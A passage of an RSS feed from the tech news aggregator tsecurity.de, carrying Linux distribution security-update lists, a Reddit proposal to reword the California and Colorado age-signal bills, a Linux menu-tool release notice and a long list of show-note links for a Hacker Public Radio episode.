<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (chromium), <b>Fedora</b> (freerdp, libsixel, opensips, and yt-dlp), <b>Mageia</b> (python-django, rsync, and vim), <b>Red Hat</b> (go-rpm-macros and osbuild-composer), <b>SUSE</b> (7zip, assertj-core, autogen, c3p0, cockpit-machines, cockpit, cockpit-repos, containerized-data-importer, cpp-httplib, docker, docker-stable, expat, firefox, gnutls, go1.25-openssl, golang-github-prometheus-prometheus, haproxy, ImageMagick, incus, kernel, kubevirt, libsoup, libsoup2, mchange-commons, ocaml, openCryptoki, openvpn, php-composer2, postgresql14, postgresql15, python-Authlib, python-azure-core, python-nltk, python-urllib3_1, python311-Django4, python311-pillow-heif, python311-PyPDF2, python313, python313-Django6, qemu, rhino, roundcubemail, ruby4.0-rubygem-rack, sdbootutil, and wicked2nm), and <b>Ubuntu</b> (less, nss, python-bleach, qtbase-opensource-src, and zutty).]]></content:encoded>
</item>
<item>
<title><![CDATA[Fixing the California and Colorado bills.]]></title>
<description><![CDATA[EDIT: For non-Americans, I am talking about this California law: https://leginfo.legislature.ca.gov/faces/billNavClient.xhtml?bill_id=202520260AB1043 There's actually a very simple fix for the California law (probably too late) and the very similar Colorado bill (not yet too late). This part:  (b...]]></description>
<link>https://tsecurity.de/de/3326726/linux-tipps/fixing-the-california-and-colorado-bills/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3326726/linux-tipps/fixing-the-california-and-colorado-bills/</guid>
<pubDate>Thu, 05 Mar 2026 02:51:56 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>EDIT: For non-Americans, I am talking about this California law: <a href="https://leginfo.legislature.ca.gov/faces/billNavClient.xhtml?bill_id=202520260AB1043">https://leginfo.legislature.ca.gov/faces/billNavClient.xhtml?bill_id=202520260AB1043</a></p> <p>There's actually a very simple fix for the California law (probably too late) and the very similar Colorado bill (not yet too late).</p> <p>This part:</p> <blockquote> <p>(b) (1) A developer shall request a signal with respect to a particular user from an operating system provider or a covered application store when the application is downloaded and launched.</p> </blockquote> <p>and the subsequent sections referring to "a developer" are the only problematic parts. First, because they require a developer (an actual <em>person</em>) to request the age-bracket signal rather than the application, and second because they apply to all applications. The fix is to reword it as follows:</p> <blockquote> <p>(b) (1) An age-sensitive application shall request a signal with respect to a particular user from an operating system provider or a covered application store when the application is downloaded and launched.</p> </blockquote> <p>We need one more definition:</p> <blockquote> <p>An "age-sensitive application" is an application that, in the normal course of usage for which it was designed, can provide access to age-restricted material.</p> </blockquote> <p>And finally, we change "developer" to "age-sensitive application" in the sections following the one I exerpted above.</p> <p>So for example, a Web browser would be an age-sensitive application, but rsync and PostgreSQL would not.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/DFS_0019287"> /u/DFS_0019287 </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1rkqgs1/fixing_the_california_and_colorado_bills/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1rkqgs1/fixing_the_california_and_colorado_bills/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Wednesday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (container-tools:rhel8, firefox, go-rpm-macros, kernel, kernel-rt, mingw-fontconfig, nginx:1.24, thunderbird, and valkey), Debian (gimp), Fedora (apt, avr-binutils, keylime, keylime-agent-rust, perl-Crypt-URandom, python-apt, and rsync), Red Hat (go-...]]></description>
<link>https://tsecurity.de/de/3325495/linux-tipps/security-updates-for-wednesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3325495/linux-tipps/security-updates-for-wednesday/</guid>
<pubDate>Wed, 04 Mar 2026 15:22:54 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (container-tools:rhel8, firefox, go-rpm-macros, kernel, kernel-rt, mingw-fontconfig, nginx:1.24, thunderbird, and valkey), <b>Debian</b> (gimp), <b>Fedora</b> (apt, avr-binutils, keylime, keylime-agent-rust, perl-Crypt-URandom, python-apt, and rsync), <b>Red Hat</b> (go-rpm-macros and yggdrasil-worker-package-manager), <b>Slackware</b> (python3), <b>SUSE</b> (busybox, cosign, cups, docker, evolution-data-server, freerdp, glibc, gnome-remote-desktop, go1.24-openssl, go1.25-openssl, govulncheck-vulndb, libpng16, libsoup, libssh, libxml2, patch, postgresql14, postgresql15, postgresql16, postgresql17, postgresql18, python, python311, rust-keylime, smc-tools, tracker-miners, and zlib), and <b>Ubuntu</b> (curl, imagemagick, intel-microcode, linux, linux-aws, linux-kvm, linux-aws, linux-aws-5.15, linux-gcp-5.15, linux-hwe-5.15, linux-ibm, linux-ibm-5.15, linux-nvidia-tegra-5.15, linux-nvidia-tegra-igx, linux-oracle-5.15, linux-aws-fips, and linux-raspi, linux-raspi-5.4).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Pufferüberlauf in rsync (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3324966/unix-server/security-pufferueberlauf-in-rsync-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3324966/unix-server/security-pufferueberlauf-in-rsync-fedora/</guid>
<pubDate>Wed, 04 Mar 2026 12:32:17 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[iwmenu/bzmenu/pwmenu v0.4 released: launcher-driven Wi-Fi/Bluetooth/audio managers for Linux]]></title>
<description><![CDATA[iwmenu (iNet Wireless Menu), bzmenu (BlueZ Menu), and pwmenu (PipeWire Menu) are minimal Wi-Fi, Bluetooth, and audio managers for Linux that integrate with dmenu, rofi, fuzzel, or any launcher supporting dmenu/stdin mode.    submitted by    /u/e-tho   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3320636/linux-tipps/iwmenubzmenupwmenu-v04-released-launcher-driven-wi-fibluetoothaudio-managers-for-linux/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3320636/linux-tipps/iwmenubzmenupwmenu-v04-released-launcher-driven-wi-fibluetoothaudio-managers-for-linux/</guid>
<pubDate>Mon, 02 Mar 2026 17:07:31 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>iwmenu (<strong>i</strong>Net <strong>W</strong>ireless <strong>M</strong>enu), bzmenu (<strong>B</strong>lue<strong>Z</strong> <strong>M</strong>enu), and pwmenu (<strong>P</strong>ipe<strong>W</strong>ire <strong>M</strong>enu) are minimal Wi-Fi, Bluetooth, and audio managers for Linux that integrate with dmenu, rofi, fuzzel, or any launcher supporting dmenu/stdin mode.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/e-tho"> /u/e-tho </a> <br> <span><a href="https://github.com/search?q=repo:e-tho/iwmenu+repo:e-tho/bzmenu+repo:e-tho/pwmenu&amp;type=repositories">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1ririfw/iwmenubzmenupwmenu_v04_released_launcherdriven/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[HPR4582: Hackerpublic Radio New Years Eve Show 2026 Episode 1]]></title>
<description><![CDATA[This show has been flagged as Explicit by the host.



Hackerpublic Radio New Years Eve Show 2026












Episode 1








Facebook 









https://www.facebook.com/









LinkedIn








linkedin.com/








Matrix









https://matrix.org/

...]]></description>
<link>https://tsecurity.de/de/3306069/podcasts/hpr4582-hackerpublic-radio-new-years-eve-show-2026-episode-1/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3306069/podcasts/hpr4582-hackerpublic-radio-new-years-eve-show-2026-episode-1/</guid>
<pubDate>Tue, 24 Feb 2026 01:02:34 +0100</pubDate>
<category>🎥 Podcasts</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This show has been flagged as Explicit by the host.</p>

<p>

Hackerpublic Radio New Years Eve Show 2026
</p>

<p>

</p>

<p>

</p>

<p>

Episode 1
</p>

<p>

</p>

<p>

Facebook 
</p>

<p>

</p>

<p>

<a href="https://www.facebook.com/" rel="noopener noreferrer" target="_blank">
https://www.facebook.com/</a>

</p>

<p>

</p>

<p>

LinkedIn
</p>

<p>

</p>

<p>

linkedin.com/
</p>

<p>

</p>

<p>

Matrix
</p>

<p>

</p>

<p>

<a href="https://matrix.org/" rel="noopener noreferrer" target="_blank">
https://matrix.org/</a>

</p>

<p>

</p>

<p>

Twitter / X
</p>

<p>

</p>

<p>

<a href="https://x.com/home" rel="noopener noreferrer" target="_blank">
https://x.com/home</a>

</p>

<p>

</p>

<p>

Telegram
</p>

<p>

</p>

<p>

<a href="https://telegram.org/" rel="noopener noreferrer" target="_blank">
https://telegram.org/</a>

</p>

<p>

</p>

<p>

Mastadon
</p>

<p>

</p>

<p>

<a href="https://joinmastodon.org/" rel="noopener noreferrer" target="_blank">
https://joinmastodon.org/</a>

</p>

<p>

</p>

<p>

India
</p>

<p>

</p>

<p>

<a href="https://www.incredibleindia.gov.in/en" rel="noopener noreferrer" target="_blank">
https://www.incredibleindia.gov.in/en</a>

</p>

<p>

</p>

<p>

Poland
</p>

<p>

</p>

<p>

<a href="https://www.poland.travel/en/" rel="noopener noreferrer" target="_blank">
https://www.poland.travel/en/</a>

</p>

<p>

</p>

<p>

Hacker Public Radio
</p>

<p>

</p>

<p>

<a href="https://hackerpublicradio.org/" rel="noopener noreferrer" target="_blank">
https://hackerpublicradio.org/</a>

</p>

<p>

</p>

<p>

Mumble
</p>

<p>

</p>

<p>

<a href="https://www.mumble.info/" rel="noopener noreferrer" target="_blank">
https://www.mumble.info/</a>

</p>

<p>

</p>

<p>

Linux Lugcast
</p>

<p>

</p>

<p>

<a href="https://linuxlugcast.com/" rel="noopener noreferrer" target="_blank">
https://linuxlugcast.com/</a>

</p>

<p>

</p>

<p>

Jitsi 
</p>

<p>

</p>

<p>

<a href="https://jitsi.org/" rel="noopener noreferrer" target="_blank">
https://jitsi.org/</a>

</p>

<p>

</p>

<p>

Ton Roosendaal (former Blender CEO)
</p>

<p>

</p>

<p>

<a href="https://en.wikipedia.org/wiki/Ton_Roosendaal" rel="noopener noreferrer" target="_blank">
https://en.wikipedia.org/wiki/Ton_Roosendaal</a>

</p>

<p>

<a href="https://www.blender.org/press/blender-foundation-announces-new-board-and-executive-director/" rel="noopener noreferrer" target="_blank">
https://www.blender.org/press/blender-foundation-announces-new-board-and-executive-director/</a>

</p>

<p>

</p>

<p>

Linus Torvalds
</p>

<p>

</p>

<p>

<a href="https://github.com/torvalds" rel="noopener noreferrer" target="_blank">
https://github.com/torvalds</a>

</p>

<p>

</p>

<p>

Hack A Day 
</p>

<p>

</p>

<p>

<a href="https://hackaday.com/" rel="noopener noreferrer" target="_blank">
https://hackaday.com/</a>

</p>

<p>

</p>

<p>

Terry Pratchett
</p>

<p>

</p>

<p>

<a href="https://terrypratchett.com/" rel="noopener noreferrer" target="_blank">
https://terrypratchett.com/</a>

</p>

<p>

</p>

<p>

UTC
</p>

<p>

</p>

<p>

<a href="https://www.timeanddate.com/time/aboututc.html" rel="noopener noreferrer" target="_blank">
https://www.timeanddate.com/time/aboututc.html</a>

</p>

<p>

</p>

<p>

DMCA
</p>

<p>

</p>

<p>

<a href="https://www.eff.org/issues/dmca" rel="noopener noreferrer" target="_blank">
https://www.eff.org/issues/dmca</a>

</p>

<p>

</p>

<p>

Spotify
</p>

<p>

</p>

<p>

<a href="https://open.spotify.com/" rel="noopener noreferrer" target="_blank">
https://open.spotify.com/</a>

</p>

<p>

</p>

<p>

Youtube
</p>

<p>

</p>

<p>

<a href="https://www.youtube.com/" rel="noopener noreferrer" target="_blank">
https://www.youtube.com/</a>

</p>

<p>

</p>

<p>

Peertube
</p>

<p>

</p>

<p>

<a href="https://joinpeertube.org/" rel="noopener noreferrer" target="_blank">
https://joinpeertube.org/</a>

</p>

<p>

</p>

<p>

Day Trading
</p>

<p>

</p>

<p>

<a href="https://www.investopedia.com/articles/trading/05/011705.asp" rel="noopener noreferrer" target="_blank">
https://www.investopedia.com/articles/trading/05/011705.asp</a>

</p>

<p>

<a href="https://www.nerdwallet.com/investing/best/online-brokers-platforms-for-day-trading" rel="noopener noreferrer" target="_blank">
https://www.nerdwallet.com/investing/best/online-brokers-platforms-for-day-trading</a>

</p>

<p>

</p>

<p>

Ogg Camp
</p>

<p>

</p>

<p>

<a href="https://www.oggcamp.org/" rel="noopener noreferrer" target="_blank">
https://www.oggcamp.org/</a>

</p>

<p>

</p>

<p>

FosDem
</p>

<p>

</p>

<p>

<a href="https://fosdem.org/2026/" rel="noopener noreferrer" target="_blank">
https://fosdem.org/2026/</a>

</p>

<p>

</p>

<p>

Brussels
</p>

<p>

</p>

<p>

<a href="https://www.visit.brussels/en/visitors" rel="noopener noreferrer" target="_blank">
https://www.visit.brussels/en/visitors</a>

</p>

<p>

</p>

<p>

Ohio Linux Fest
</p>

<p>

</p>

<p>

<a href="https://olfconference.org/" rel="noopener noreferrer" target="_blank">
https://olfconference.org/</a>

</p>

<p>

</p>

<p>

Jacksonville, Florida
</p>

<p>

</p>

<p>

<a href="https://www.visitjacksonville.com/" rel="noopener noreferrer" target="_blank">
https://www.visitjacksonville.com/</a>

</p>

<p>

</p>

<p>

Ebike
</p>

<p>

</p>

<p>

<a href="https://www.bikeradar.com/advice/buyers-guides/what-is-an-electric-bike" rel="noopener noreferrer" target="_blank">
https://www.bikeradar.com/advice/buyers-guides/what-is-an-electric-bike</a>

</p>

<p>

</p>

<p>

Electric Scooter
</p>

<p>

</p>

<p>

<a href="https://engineerfix.com/what-is-an-electric-scooter-and-how-does-it-work/" rel="noopener noreferrer" target="_blank">
https://engineerfix.com/what-is-an-electric-scooter-and-how-does-it-work/</a>

</p>

<p>

</p>

<p>

Elliptical 
</p>

<p>

</p>

<p>

<a href="https://ellipticalking.com/what-is-an-elliptical/" rel="noopener noreferrer" target="_blank">
https://ellipticalking.com/what-is-an-elliptical/</a>

</p>

<p>

</p>

<p>

Panera Bread 
</p>

<p>

</p>

<p>

<a href="https://www.panerabread.com/" rel="noopener noreferrer" target="_blank">
https://www.panerabread.com/</a>

</p>

<p>

</p>

<p>

Tech and Coffee 
</p>

<p>

</p>

<p>

<a href="https://techandcoffee.info/" rel="noopener noreferrer" target="_blank">
https://techandcoffee.info/</a>

</p>

<p>

</p>

<p>

HTC Phones
</p>

<p>

</p>

<p>

<a href="https://www.htc.com/us/smartphones-learn/" rel="noopener noreferrer" target="_blank">
https://www.htc.com/us/smartphones-learn/</a>

</p>

<p>

</p>

<p>

Apple
</p>

<p>

</p>

<p>

<a href="https://www.apple.com/" rel="noopener noreferrer" target="_blank">
https://www.apple.com/</a>

</p>

<p>

</p>

<p>

Windows 
</p>

<p>

</p>

<p>

<a href="https://www.microsoft.com/en-us/windows" rel="noopener noreferrer" target="_blank">
https://www.microsoft.com/en-us/windows</a>

</p>

<p>

</p>

<p>

LG
</p>

<p>

</p>

<p>

<a href="https://www.lg.com/us/" rel="noopener noreferrer" target="_blank">
https://www.lg.com/us/</a>

</p>

<p>

</p>

<p>

2FA (2 Factor Authentication)
</p>

<p>

</p>

<p>

<a href="https://www.investopedia.com/terms/t/twofactor-authentication-2fa.asp" rel="noopener noreferrer" target="_blank">
https://www.investopedia.com/terms/t/twofactor-authentication-2fa.asp</a>

</p>

<p>

</p>

<p>

Symantec VIP
</p>

<p>

</p>

<p>

<a href="https://vip.symantec.com/" rel="noopener noreferrer" target="_blank">
https://vip.symantec.com/</a>

</p>

<p>

</p>

<p>

Android
</p>

<p>

</p>

<p>

<a href="https://www.android.com/" rel="noopener noreferrer" target="_blank">
https://www.android.com/</a>

</p>

<p>

</p>

<p>

Discord
</p>

<p>

</p>

<p>

<a href="https://discord.com/" rel="noopener noreferrer" target="_blank">
https://discord.com/</a>

</p>

<p>

</p>

<p>

NewPipe
</p>

<p>

</p>

<p>

<a href="https://newpipe.net/" rel="noopener noreferrer" target="_blank">
https://newpipe.net/</a>

</p>

<p>

</p>

<p>

iCloud
</p>

<p>

</p>

<p>

<a href="https://www.icloud.com/" rel="noopener noreferrer" target="_blank">
https://www.icloud.com/</a>

</p>

<p>

</p>

<p>

Bloomberg Terminal
</p>

<p>

</p>

<p>

<a href="https://www.bloomberg.com/professional/terminal-introduction/" rel="noopener noreferrer" target="_blank">
https://www.bloomberg.com/professional/terminal-introduction/</a>

</p>

<p>

</p>

<p>

Linux Mint
</p>

<p>

</p>

<p>

<a href="https://linuxmint.com/" rel="noopener noreferrer" target="_blank">
https://linuxmint.com/</a>

</p>

<p>

</p>

<p>

Suse
</p>

<p>

</p>

<p>

<a href="https://www.suse.com/" rel="noopener noreferrer" target="_blank">
https://www.suse.com/</a>

</p>

<p>

</p>

<p>

EndeavourOS
</p>

<p>

</p>

<p>

<a href="https://endeavouros.com/" rel="noopener noreferrer" target="_blank">
https://endeavouros.com/</a>

</p>

<p>

</p>

<p>

Pop OS
</p>

<p>

</p>

<p>

<a href="https://system76.com/pop/" rel="noopener noreferrer" target="_blank">
https://system76.com/pop/</a>

</p>

<p>

</p>

<p>

Debian
</p>

<p>

</p>

<p>

<a href="https://www.debian.org/" rel="noopener noreferrer" target="_blank">
https://www.debian.org/</a>

</p>

<p>

</p>

<p>

Red Hat
</p>

<p>

</p>

<p>

<a href="https://www.redhat.com/en" rel="noopener noreferrer" target="_blank">
https://www.redhat.com/en</a>

</p>

<p>

</p>

<p>

EB  / Electronics Boutique / EB Games)
</p>

<p>

</p>

<p>

<a href="https://en.wikipedia.org/wiki/EB_Games" rel="noopener noreferrer" target="_blank">
https://en.wikipedia.org/wiki/EB_Games</a>

</p>

<p>

</p>

<p>

RockBox
</p>

<p>

</p>

<p>

<a href="https://www.rockbox.org/" rel="noopener noreferrer" target="_blank">
https://www.rockbox.org/</a>

</p>

<p>

</p>

<p>

Hi Fi Walker
</p>

<p>

</p>

<p>

<a href="https://hifiwalker.com/" rel="noopener noreferrer" target="_blank">
https://hifiwalker.com/</a>

</p>

<p>

</p>

<p>

MPEG 
</p>

<p>

</p>

<p>

<a href="https://www.mpeg.org/" rel="noopener noreferrer" target="_blank">
https://www.mpeg.org/</a>

</p>

<p>

</p>

<p>

MP3
</p>

<p>

</p>

<p>

<a href="https://www.magix.com/us/music-editing/audio-formats/mp3/" rel="noopener noreferrer" target="_blank">
https://www.magix.com/us/music-editing/audio-formats/mp3/</a>

</p>

<p>

</p>

<p>

MicroSD Card
</p>

<p>

</p>

<p>

<a href="https://www.businessinsider.com/reference/what-is-a-micro-sd-card" rel="noopener noreferrer" target="_blank">
https://www.businessinsider.com/reference/what-is-a-micro-sd-card</a>

</p>

<p>

</p>

<p>

RSS Feed
</p>

<p>

</p>

<p>

<a href="https://en.wikipedia.org/wiki/RSS" rel="noopener noreferrer" target="_blank">
https://en.wikipedia.org/wiki/RSS</a>

</p>

<p>

<a href="https://www.reddit.com/r/explainlikeimfive/comments/15kfcsm/eli5_what_is_rss_feed_and_how_is_it_useful/" rel="noopener noreferrer" target="_blank">
https://www.reddit.com/r/explainlikeimfive/comments/15kfcsm/eli5_what_is_rss_feed_and_how_is_it_useful/</a>

</p>

<p>

</p>

<p>

YouTube DL
</p>

<p>

</p>

<p>

<a href="https://ytdl-org.github.io/youtube-dl/index.html" rel="noopener noreferrer" target="_blank">
https://ytdl-org.github.io/youtube-dl/index.html</a>

</p>

<p>

</p>

<p>

Jupiter Extras Podcast
</p>

<p>

</p>

<p>

<a href="https://www.jupiterbroadcasting.com/show/jupiter-extras/" rel="noopener noreferrer" target="_blank">
https://www.jupiterbroadcasting.com/show/jupiter-extras/</a>

</p>

<p>

</p>

<p>

Late Night Linux Podcast
</p>

<p>

</p>

<p>

<a href="https://latenightlinux.com/" rel="noopener noreferrer" target="_blank">
https://latenightlinux.com/</a>

</p>

<p>

</p>

<p>

Sound Show Podcast
</p>

<p>

</p>

<p>

<a href="https://grokipedia.com/page/the_sound_show" rel="noopener noreferrer" target="_blank">
https://grokipedia.com/page/the_sound_show</a>

</p>

<p>

</p>

<p>

Linux Lugcast
</p>

<p>

</p>

<p>

<a href="https://linuxlugcast.com/" rel="noopener noreferrer" target="_blank">
https://linuxlugcast.com/</a>

</p>

<p>

</p>

<p>

Tux Jam
</p>

<p>

</p>

<p>

<a href="https://tuxjam.otherside.network/" rel="noopener noreferrer" target="_blank">
https://tuxjam.otherside.network/</a>

</p>

<p>

</p>

<p>

Hacker Public Radio
</p>

<p>

</p>

<p>

<a href="https://hackerpublicradio.org/" rel="noopener noreferrer" target="_blank">
https://hackerpublicradio.org/</a>

</p>

<p>

</p>

<p>

3D Printing
</p>

<p>

</p>

<p>

<a href="https://3dprinting.com/what-is-3d-printing/" rel="noopener noreferrer" target="_blank">
https://3dprinting.com/what-is-3d-printing/</a>

</p>

<p>

</p>

<p>

Raspberry Pi
</p>

<p>

</p>

<p>

<a href="https://www.raspberrypi.com/" rel="noopener noreferrer" target="_blank">
https://www.raspberrypi.com/</a>

</p>

<p>

</p>

<p>

Nextcloud
</p>

<p>

</p>

<p>

<a href="https://nextcloud.com/" rel="noopener noreferrer" target="_blank">
https://nextcloud.com/</a>

</p>

<p>

</p>

<p>

Jellyfin
</p>

<p>

</p>

<p>

<a href="https://jellyfin.org/" rel="noopener noreferrer" target="_blank">
https://jellyfin.org/</a>

</p>

<p>

</p>

<p>

DVD Ripping
</p>

<p>

</p>

<p>

<a href="https://www.tomshardware.com/software/how-to-rip-your-dvds-with-handbrake-preserve-your-dvd-library-before-bit-rot-claims-another-victim" rel="noopener noreferrer" target="_blank">
https://www.tomshardware.com/software/how-to-rip-your-dvds-with-handbrake-preserve-your-dvd-library-before-bit-rot-claims-another-victim</a>

</p>

<p>

</p>

<p>

Port Forwarding
</p>

<p>

</p>

<p>

<a href="https://www.noip.com/support/knowledgebase/general-port-forwarding-guide" rel="noopener noreferrer" target="_blank">
https://www.noip.com/support/knowledgebase/general-port-forwarding-guide</a>

</p>

<p>

</p>

<p>

NginX 
</p>

<p>

</p>

<p>

<a href="https://nginx.org/" rel="noopener noreferrer" target="_blank">
https://nginx.org/</a>

</p>

<p>

</p>

<p>

LiquidSoap
</p>

<p>

</p>

<p>

<a href="https://www.liquidsoap.info/doc-dev/" rel="noopener noreferrer" target="_blank">
https://www.liquidsoap.info/doc-dev/</a>

</p>

<p>

</p>

<p>

IceCast
</p>

<p>

</p>

<p>

<a href="https://icecast.org/" rel="noopener noreferrer" target="_blank">
https://icecast.org/</a>

</p>

<p>

</p>

<p>

DYN DNS
</p>

<p>

</p>

<p>

<a href="https://account.dyn.com/" rel="noopener noreferrer" target="_blank">
https://account.dyn.com/</a>

</p>

<p>

</p>

<p>

Etherpad
</p>

<p>

</p>

<p>

<a href="https://etherpad.org/" rel="noopener noreferrer" target="_blank">
https://etherpad.org/</a>

</p>

<p>

</p>

<p>

Audio Bookshelf
</p>

<p>

</p>

<p>

<a href="https://www.audiobookshelf.org/" rel="noopener noreferrer" target="_blank">
https://www.audiobookshelf.org/</a>

</p>

<p>

</p>

<p>

Funk Whale
</p>

<p>

</p>

<p>

<a href="https://www.funkwhale.audio/" rel="noopener noreferrer" target="_blank">
https://www.funkwhale.audio/</a>

</p>

<p>

</p>

<p>

Pixel Art
</p>

<p>

</p>

<p>

<a href="https://www.sandromaglione.com/articles/getting-started-with-pixel-art" rel="noopener noreferrer" target="_blank">
https://www.sandromaglione.com/articles/getting-started-with-pixel-art</a>

</p>

<p>

</p>

<p>

Aseprite
</p>

<p>

</p>

<p>

<a href="https://www.aseprite.org/" rel="noopener noreferrer" target="_blank">
https://www.aseprite.org/</a>

</p>

<p>

</p>

<p>

Krita
</p>

<p>

</p>

<p>

<a href="https://krita.org/en/" rel="noopener noreferrer" target="_blank">
https://krita.org/en/</a>

</p>

<p>

</p>

<p>

RPG Maker 
</p>

<p>

</p>

<p>

<a href="https://www.rpgmakerweb.com/" rel="noopener noreferrer" target="_blank">
https://www.rpgmakerweb.com/</a>

</p>

<p>

</p>

<p>

Stable Diffusion
</p>

<p>

</p>

<p>

<a href="https://stablediffusionweb.com/" rel="noopener noreferrer" target="_blank">
https://stablediffusionweb.com/</a>

</p>

<p>

</p>

<p>

GIMP
</p>

<p>

</p>

<p>

<a href="https://www.gimp.org/" rel="noopener noreferrer" target="_blank">
https://www.gimp.org/</a>

</p>

<p>

</p>

<p>

Balatro
</p>

<p>

</p>

<p>

<a href="https://www.playbalatro.com/" rel="noopener noreferrer" target="_blank">
https://www.playbalatro.com/</a>

</p>

<p>

</p>

<p>

Magic The Gathering Balatro MOD
</p>

<p>

</p>

<p>

<a href="https://balatromods.miraheze.org/wiki/Magic:_the_Jokering" rel="noopener noreferrer" target="_blank">
https://balatromods.miraheze.org/wiki/Magic:_the_Jokering</a>

</p>

<p>

</p>

<p>

Yoshi 
</p>

<p>

</p>

<p>

<a href="https://www.mariowiki.com/Yoshi" rel="noopener noreferrer" target="_blank">
https://www.mariowiki.com/Yoshi</a>

</p>

<p>

</p>

<p>

Gungeon (Enter the Gungeon)
</p>

<p>

</p>

<p>

<a href="https://enterthegungeon.fandom.com/wiki/Enter_the_Gungeon_Wiki" rel="noopener noreferrer" target="_blank">
https://enterthegungeon.fandom.com/wiki/Enter_the_Gungeon_Wiki</a>

</p>

<p>

</p>

<p>

Clover Pit
</p>

<p>

</p>

<p>

<a href="https://store.steampowered.com/app/3314790/CloverPit/" rel="noopener noreferrer" target="_blank">
https://store.steampowered.com/app/3314790/CloverPit/</a>

</p>

<p>

</p>

<p>

Trackball
</p>

<p>

</p>

<p>

<a href="https://www.techtarget.com/whatis/definition/trackball" rel="noopener noreferrer" target="_blank">
https://www.techtarget.com/whatis/definition/trackball</a>

</p>

<p>

</p>

<p>

Humble Bundle
</p>

<p>

</p>

<p>

<a href="https://www.humblebundle.com/" rel="noopener noreferrer" target="_blank">
https://www.humblebundle.com/</a>

</p>

<p>

</p>

<p>

Dungeons / Dungeons II / Dungeons III 
</p>

<p>

</p>

<p>

<a href="http://www.realmforgestudios.com/" rel="noopener noreferrer" target="_blank">
http://www.realmforgestudios.com/</a>

</p>

<p>

</p>

<p>

Deltarune
</p>

<p>

</p>

<p>

<a href="https://deltarune.com/" rel="noopener noreferrer" target="_blank">
https://deltarune.com/</a>

</p>

<p>

</p>

<p>

Undertale 
</p>

<p>

</p>

<p>

<a href="https://undertale.com/" rel="noopener noreferrer" target="_blank">
https://undertale.com/</a>

</p>

<p>

</p>

<p>

DNS
</p>

<p>

</p>

<p>

<a href="https://www.cloudflare.com/learning/dns/what-is-dns/" rel="noopener noreferrer" target="_blank">
https://www.cloudflare.com/learning/dns/what-is-dns/</a>

</p>

<p>

</p>

<p>

Universal Studios
</p>

<p>

</p>

<p>

<a href="https://www.universalorlando.com/web/en/us/theme-parks/universal-studios-florida" rel="noopener noreferrer" target="_blank">
https://www.universalorlando.com/web/en/us/theme-parks/universal-studios-florida</a>

</p>

<p>

</p>

<p>

Electric Blanket
</p>

<p>

</p>

<p>

<a href="https://www.silentnight.co.uk/blog/guides/tips-for-using-your-electric-blanket" rel="noopener noreferrer" target="_blank">
https://www.silentnight.co.uk/blog/guides/tips-for-using-your-electric-blanket</a>

</p>

<p>

</p>

<p>

Electric Vests
</p>

<p>

</p>

<p>

<a href="https://www.fieldandstream.com/outdoor-gear/hunting/hunting-apparel-and-accessories/best-heated-vests" rel="noopener noreferrer" target="_blank">
https://www.fieldandstream.com/outdoor-gear/hunting/hunting-apparel-and-accessories/best-heated-vests</a>

</p>

<p>

</p>

<p>

LG Neckband Headphones
</p>

<p>

</p>

<p>

<a href="https://www.lg.com/us/neckbands/view-all" rel="noopener noreferrer" target="_blank">
https://www.lg.com/us/neckbands/view-all</a>

</p>

<p>

</p>

<p>

Lotus Notes
</p>

<p>

</p>

<p>

<a href="https://en.wikipedia.org/wiki/HCL_Notes" rel="noopener noreferrer" target="_blank">
https://en.wikipedia.org/wiki/HCL_Notes</a>

</p>

<p>

</p>

<p>

John Deer
</p>

<p>

</p>

<p>

<a href="https://www.deere.com/en/" rel="noopener noreferrer" target="_blank">
https://www.deere.com/en/</a>

</p>

<p>

</p>

<p>

Dairy Queen
</p>

<p>

</p>

<p>

<a href="https://www.dairyqueen.com/en-us/" rel="noopener noreferrer" target="_blank">
https://www.dairyqueen.com/en-us/</a>

</p>

<p>

</p>

<p>

Alco (retail store)
</p>

<p>

</p>

<p>

<a href="https://en.wikipedia.org/wiki/ALCO_Stores" rel="noopener noreferrer" target="_blank">
https://en.wikipedia.org/wiki/ALCO_Stores</a>

</p>

<p>

</p>

<p>

AMI Pro
</p>

<p>

</p>

<p>

<a href="https://www.computinghistory.org.uk/det/18775/Ami-Pro-for-Windows/" rel="noopener noreferrer" target="_blank">
https://www.computinghistory.org.uk/det/18775/Ami-Pro-for-Windows/</a>

</p>

<p>

</p>

<p>

Disgraphia
</p>

<p>

</p>

<p>

<a href="https://my.clevelandclinic.org/health/diseases/23294-dysgraphia" rel="noopener noreferrer" target="_blank">
https://my.clevelandclinic.org/health/diseases/23294-dysgraphia</a>

</p>

<p>

</p>

<p>

Cursive
</p>

<p>

</p>

<p>

<a href="https://brainspring.com/orton-gillingham-weekly/what-is-cursive-why-is-it-used/" rel="noopener noreferrer" target="_blank">
https://brainspring.com/orton-gillingham-weekly/what-is-cursive-why-is-it-used/</a>

</p>

<p>

</p>

<p>

SUNLU Wood PLA
